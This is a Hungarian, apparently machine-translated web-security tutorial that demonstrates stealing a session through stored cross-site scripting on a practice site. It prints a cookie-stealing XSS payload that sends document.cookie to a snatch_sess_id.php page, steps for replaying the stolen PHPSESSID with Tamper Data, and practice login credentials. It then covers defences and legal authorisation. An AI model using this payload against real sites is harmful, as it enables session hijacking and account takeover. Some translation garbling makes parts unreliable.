Hogyan lehet feltörni egy weboldalt? Webhelyfeltörési technikák

⚡ Okos összefoglaló

A weboldalak feltörése a webes alkalmazások gyengeségeit – rosszul megírt kódot, nem ellenőrzött bemenetet és gyenge munkamenet-kezelést – használja ki jogosulatlan hozzáférés megszerzése érdekében. Ez az oldal bemutatja a gyakori támadási technikákat, és ami még fontosabb, azokat az ellenintézkedéseket, amelyek biztonságban tartják a weboldalakat.

  • 🌐 Target: A webes alkalmazások elfogadják a felhasználói bevitelt az interneten keresztül, így minden érvénytelen mezőt támadásnak tesznek ki.
  • ???? technikák: Az SQL-injekció, a webhelyek közötti szkriptelés, a munkamenet-mérgezés, az űrlapok manipulálása és a kódbefecskendezés vezeti a listát.
  • 🍪 Munkamenet-eltérítés: Egy ellopott munkamenet-azonosító lehetővé teszi a támadó számára, hogy jelszó nélkül adja ki magát egy bejelentkezett felhasználónak.
  • 🛡️ Védelem: A bemeneti validáció, a paraméteres lekérdezések és a titkosított munkamenet-sütik áthidalják a gyakori hiányosságokat.
  • 🎯 Standard: Az OWASP Top 10 felsorolja azokat a webes sebezhetőségeket, amelyeket minden fejlesztőnek tesztelnie kell.
  • 🤖 Modern élvonal: A mesterséges intelligenciával működő tűzfalak valós időben tanulják meg a normál forgalmat, és jelzik a behatolási kísérleteket.

Hogyan kell feltörni egy webhelyet

Több ember fér hozzá az internethez, mint valaha. Ez sok szervezetet késztetett arra, hogy olyan webalapú alkalmazásokat fejlesszen ki, amelyek segítségével a felhasználók online kapcsolatba léphetnek a szervezettel. A webalkalmazások rosszul megírt kódja kihasználható érzékeny adatokhoz és webszerverekhez való jogosulatlan hozzáféréshez.

Megtanulod a weboldalak feltörésére szolgáló gyakori technikákat és az ilyen támadások elleni védekezési módszereket.

Hogyan kell feltörni egy webhelyet

Ebben a webhely-hackelés gyakorlati forgatókönyvében a webalkalmazás felhasználói munkamenetét fogjuk eltéríteni a címen www.techpanda.orgKeresztoldali szkriptelést fogunk használni a süti munkamenet-azonosítójának beolvasásához, majd egy legitim felhasználói munkamenet utánzásához.

A feltételezés az, hogy a támadó hozzáfér a webes alkalmazáshoz, és szeretné eltéríteni az ugyanazon alkalmazást használó többi felhasználó munkamenetét. A támadás célja az lehet, hogy rendszergazdai hozzáférést szerezzen a webes alkalmazáshoz, feltételezve, hogy a támadó hozzáférési fiókja korlátozott.

1. lépés) Nyissa meg URL http://www.techpanda.org/.

Gyakorlási célokból erősen ajánlott SQL-injekcióval hozzáférni. Lásd: Ez a cikk az SQL injektálásról szól további információért, hogyan kell ezt megtenni.

2. lépés) Adja meg a bejelentkezési adatokat.

A bejelentkezési e-mail cím admin@google.com, a jelszó pedig Password2010.

3. lépés) Ellenőrizze a műszerfalat.

Ha sikeresen bejelentkezett, akkor a következő irányítópultot fogja látni.

A Techpanda irányítópultja megjelenik a sikeres bejelentkezés után

4. lépés) Új tartalom megadása.

Kattintson az Új kapcsolat hozzáadása gombra, és adja meg a következő keresztnevet:

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

5. lépés) Hozzáadás JavaForgatókönyv.

A fenti kódot használja JavaSzkript. Hozzáad egy hiperhivatkozást egy onclick eseménnyel. Amikor a gyanútlan felhasználó rákattint a hivatkozásra, az esemény lekéri a PHP süti munkamenet-azonosító és elküldi a snatch_sess_id.php oldalnak a munkamenet-azonosítóval együtt a URL.

Új kapcsolatfelvételi űrlap hozzáadása a keresztnév mezőbe beírt rosszindulatú szkripttel

6. lépés) Részletek hozzáadása.

Adja meg a fennmaradó adatokat az alábbiak szerint, majd kattintson a Változtatások mentése gombra.

A kitöltött kapcsolatfelvételi űrlap készen áll az adatbázisba mentésre

7. lépés) Ellenőrizze a műszerfalat.

Az irányítópult most a következő képernyőhöz hasonlóan fog kinézni.

A Kapcsolatok irányítópultja, amelyen a tárolt bejegyzés látható a Sötét hiperhivatkozással

8. lépés) Ellenőrizze a munkamenet-azonosítót.

Mivel a webhelyek közötti szkript az adatbázisban tárolódik, minden alkalommal betöltődik, amikor a hozzáférési jogosultsággal rendelkező felhasználók bejelentkeznek. Amikor a rendszergazda bejelentkezik és a Sötét hiperhivatkozásra kattint, egy ablak jelenik meg a munkamenet-azonosítóval. URL.

Böngészőablak, amelyen látható a rögzített munkamenet-azonosító, amelyet a URL

Megjegyzés: a szkript elküldheti az értéket egy távoli szerverre, ahol a PHPSESSID tárolva van, majd átirányíthatja a felhasználót vissza, mintha mi sem történt volna.

Megjegyzés: a kapott érték eltérhet az itt láthatótól, de a koncepció ugyanaz.

Munkamenet Megszemélyesítés segítségével Firefox és Tamper Data kiegészítő

Megjegyzés: az alább látható klasszikus Tamper Data kiegészítő már nem települ a jelenlegi gépre. Firefox, de az általa bemutatott koncepció – egy HTTP-kérés elfogása és módosítása egy rögzített munkamenet visszajátszása érdekében – változatlan marad.

Az alábbi folyamatábra bemutatja azokat a lépéseket, amelyeket meg kell tennie a gyakorlat végrehajtásához.

A munkamenet megszemélyesítési gyakorlatának lépéseinek folyamatábrája

  • Szükséged lesz a Firefox webböngésző ehhez a szakaszhoz és a Tamper Data bővítményhez.
  • Nyisd ki Firefox és telepítse a kiegészítőt az alábbi ábrákon látható módon.

Firefox bővítménykezelő, amely a Tamper Data bővítmény keresésére szolgál

A szabotázsadatok listája Firefox kiegészítő keresési eredmények

  • Keresd meg a szabotázsadatok kifejezést, majd kattints a telepítésre a fent látható módon.

Bővítményengedély-párbeszédpanel az Elfogadás és telepítés gombbal

  • Kattintson az Elfogadás és telepítés gombra…

Firefox a bővítmény telepítése után a böngésző újraindítására felszólítás

Firefox menüsor engedélyezve, így az Eszközök menü látható

  • Kattintson az Újraindítás most gombra, amikor a telepítés befejeződött.
  • Engedélyezze a menüsort Firefox ha nem mutatják be.

Eszközök menü megnyitva, a Tamper Data (Manipulációs adatok) ki van választva

  • Kattintson az Eszközök menüre, majd válassza a Manipulációs adatok lehetőséget az alábbiak szerint.

A kérések rögzítése előtt ürítse ki a Tamper Data ablakot

  • A következő ablakot fogja látni. Megjegyzés: Ha az ablak nem üres, kattintson a törlés gombra.

Adatmanipuláció felugró ablaka, amely a kimenő kérés manipulálására kéri fel

  • Kattintson a Szabotázs indítása menüre.
  • Váltson vissza a Firefox A webböngészőbe írja be a http://www.techpanda.org/dashboard.php címet, majd nyomja meg az Enter billentyűt az oldal betöltéséhez.
  • A következő felugró ablakot fogja kapni a Tamper Data-tól.

Manipuláció felugró ablak a Manipuláció, Küldés és Megszakítás opciókkal

  • A felugró ablakban három (3) lehetőség közül választhat. A Manipuláció lehetőség lehetővé teszi a HTTP fejlécinformációk módosítását, mielőtt azok elküldésre kerülnének a szervernek.
  • Kattintson rá.
  • A következő ablakot kapja.

Kérésfejléc-szerkesztő, ahol a süti értéke lecserélhető

  • Másold ki a támadásból kimásolt PHP munkamenet-azonosítót URL és illeszd be az egyenlőségjel után. Az értéknek most így kell kinéznie.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
  • Kattintson az OK gombra.
  • Ismét megjelenik a Szabotázsadatok felugró ablak.

A Manipulációs adatok illetéktelen kezelése felugró ablak újra megjelenik a Manipuláció folytatása jelölőnégyzettel.

  • Törölje a jelet a jelölőnégyzetből, amely a Continue Tampering?
  • Kattintson a küldés gombra, ha kész.
  • Az irányítópultnak az alábbiak szerint kell megjelennie.

A Techpanda irányítópultja a rögzített munkamenet visszajátszásával érhető el.

Megjegyzés: nem jelentkeztünk be; egy bejelentkezési munkamenetet utánoztunk a cross-site scripting segítségével lekért PHPSESSID értékkel.

Mi az a webalkalmazás? Mik azok a webes fenyegetések?

A webalkalmazás (más néven weboldal) egy kliens-szerver modellen alapuló alkalmazás. A szerver biztosítja az adatbázis-hozzáférést és az üzleti logikát. Egy webszerveren fut. A kliensalkalmazás a kliens webböngészőjében fut. A webalkalmazásokat általában olyan nyelveken írják, mint a Java, C#, VB.Net, PHP, és a ColdFusion Markup Language stb. A webes alkalmazásokban használt adatbázis-motorok közé tartoznak a következők MySQL, MS SQL Server, PostgreSQL, SQLiteStb

A legnépszerűbb webhely-hackelési technikák

A legtöbb webes alkalmazás nyilvános helyen található szerverek elérhetők az interneten keresztül. Ez a könnyű hozzáférhetőség miatt sebezhetővé teszi őket a támadásokkal szemben. Az alábbiakban a webes alkalmazásokat fenyegető gyakori fenyegetéseket ismertetjük.

  • SQL Injection – ennek a fenyegetésnek a célja lehet a bejelentkezési algoritmusok megkerülése, az adatok szabotálása stb.
  • Denial of Service Támadások – ennek a fenyegetésnek a célja az lehet, hogy megtagadja a jogos felhasználók hozzáférését az erőforráshoz.
  • Webhelyek közötti szkriptek (XSS) – ennek a fenyegetésnek a célja az lehet, hogy olyan kódot fecskendezzen be, amely végrehajtható a kliensoldali böngészőben.
  • Cookie/Session Poisoning - ennek a fenyegetésnek az a célja, hogy a támadó módosítsa a cookie-kat/munkamenetadatokat, hogy illetéktelen hozzáférést szerezzen.
  • Űrlap manipuláció – ennek a fenyegetésnek az a célja, hogy módosítsa az űrlapadatokat, például az árakat az e-kereskedelmi alkalmazásokban, hogy a támadó csökkentett áron juthasson hozzá a termékekhez.
  • Code Injekció - ennek a fenyegetésnek az a célja, hogy olyan kódot fecskendezzen be, mint a PHP, Python, stb., amelyek a szerveren végrehajthatók. A kód hátsó ajtókat telepíthet, bizalmas információkat fedhet fel stb.
  • eltorzítás – a fenyegetés célja, hogy módosítsa a weboldalon megjelenített oldalt, és az összes oldalkérés átirányítása egyetlen, a támadó üzenetét tartalmazó oldalra.

Hogyan védheti meg webhelyét a feltörések ellen?

Egy szervezet a következő házirendet alkalmazhatja, hogy megvédje magát a webszerver-támadásokkal szemben.

  • SQL Injection – a felhasználói paraméterek adatbázisba való beküldés előtti ellenőrzése és validálása segíthet csökkenteni az SQL-injekción keresztüli támadások esélyét. Adatbázismotorok, mint például az MS SQL Server, MySQLstb. támogatják a paramétereket és az előkészített utasításokat. Sokkal biztonságosabbak, mint a hagyományos SQL utasítások.
  • Szolgáltatás megtagadása – a tűzfalak segítségével el lehet állítani a gyanús IP-címekről érkező forgalmat, ha a támadás egy egyszerű DoS (szolgáltatásmegtagadás) támadás. A hálózatok megfelelő konfigurációja és egy behatolásérzékelő rendszer is segíthet csökkenteni a DoS-támadások sikerességének esélyét.
  • Cross-Site Scripting – a rendszeren keresztül átadott fejlécek és paraméterek validálása és fertőtlenítése URL, az űrlapparaméterek és a rejtett értékek segíthetnek csökkenteni az XSS-támadásokat.
  • Cookie/Session Poisoning – ez megelőzhető a sütik tartalmának titkosításával, a sütik időkorlátozásával egy bizonyos idő elteltével, és a sütiknek a létrehozásukhoz használt kliens IP-címhez való társításával.
  • Űrlap manipuláció – ez megelőzhető a felhasználói bevitel feldolgozás előtti validálásával és ellenőrzésével.
  • Code Injekció – ez megelőzhető, ha minden paramétert adatként, és nem futtatható kódként kezelünk. A fertőtlenítés és az validáció segítségével valósítható meg ez.
  • eltorzítás – egy jó webes alkalmazások biztonsága A szabályzatnak biztosítania kell, hogy lezárja a webszerverhez való hozzáféréshez gyakran használt sebezhetőségeket. Ez lehet az operációs rendszer, a webszerver szoftverének megfelelő konfigurációja és a fejlesztés során bevált biztonsági gyakorlatok.ping webes alkalmazások.

Nézd meg: 9 Legjobb URL Szkennerek annak ellenőrzésére, hogy egy hivatkozás biztonságos-e a kártevőktől

GYIK

Csak a tulajdonos írásos engedélyével. Olyan webhely tesztelése, amelynek nem a tulajdonosa, vagy amelynek értékelésére nincs jogosultsága, illegális olyan törvények értelmében, mint az Egyesült Államok Számítógépes Csalás és Visszaélés Elleni Törvénye. A hibajegy-hatókör határozza meg, hogy mi megengedett.

Figyelj a megrongált oldalakra, a váratlanul megjelenő új adminisztrátor felhasználókra, az ismeretlen fájlokra vagy szkriptekre, a spam oldalakra mutató átirányításokra és a forgalomcsúcsokra. A fájlok integritásának figyelése, a szervernaplók áttekintése és a kártevőirtó szoftverek elleni védelem a legtöbb biztonsági rés korai felismerése során segít.

Az OWASP Top 10 egy közösség által fenntartott lista a legkritikusabb webes alkalmazásbiztonsági kockázatokról. A 2025-ös kiadás a Hibás hozzáférés-vezérlést rangsorolja az első helyre, ezt követi a Biztonsági hibás konfiguráció és a Szoftverellátási lánc hibái.

A WAF ellenőrzi a bejövő HTTP forgalmat, és blokkolja az ismert támadási mintákat, például az SQL injekciót és a cross-site scriptinget, mielőtt azok elérnék az alkalmazást. Virtuális javításokat kínál, de nem helyettesíti a biztonságos kódot.

A mesterséges intelligenciával működő tűzfalak megtanulják egy webhely normál forgalmát, majd valós időben jelzik az olyan anomáliákat, mint az injekciózási kísérletek, a hitelesítő adatok beillesztése és a botokkal való visszaélés. A gépi tanulási modellek olyan nulladik napi mintákat észlelnek, amelyeket a statikus szabályok nem észlelnek, így kevesebb téves riasztást eredményeznek.

A mesterséges intelligencia asszisztensei, mint például GitHub másodpilóta felgyorsíthatják a bemeneti validáció és a paraméteres lekérdezések írását, de nem biztonságos mintákat is javasolhatnak. Minden javaslatot vázlatként kell kezelni, és telepítés előtt kérje meg egy emberi ellenőrzést.

A népszerű opciók közé tartozik a CEH, az OSCP és a CompTIA Security+, míg a CISSP széles körben lefedi a biztonsági architektúrát. Érvényesítik a sebezhetőségi felmérést, a biztonságos konfigurációt és a védelmi készségeket, amelyeket a munkaadók elvárnak a webes biztonsági szerepkörökben.

A sebezhetőségi vizsgálatok automatizáltak, és gyorsan listázzák az ismert gyengeségeket anélkül, hogy kihasználnák azokat. A behatolástesztelés egy többnyire manuális feladat, ahol a tesztelők aktívan kihasználják a hibákat a valódi hatások kimutatása érdekében. A vizsgálat széleskörű lehetőségeket kínál, míg a tolltesztelés mélységet.

Foglald össze ezt a bejegyzést a következőképpen: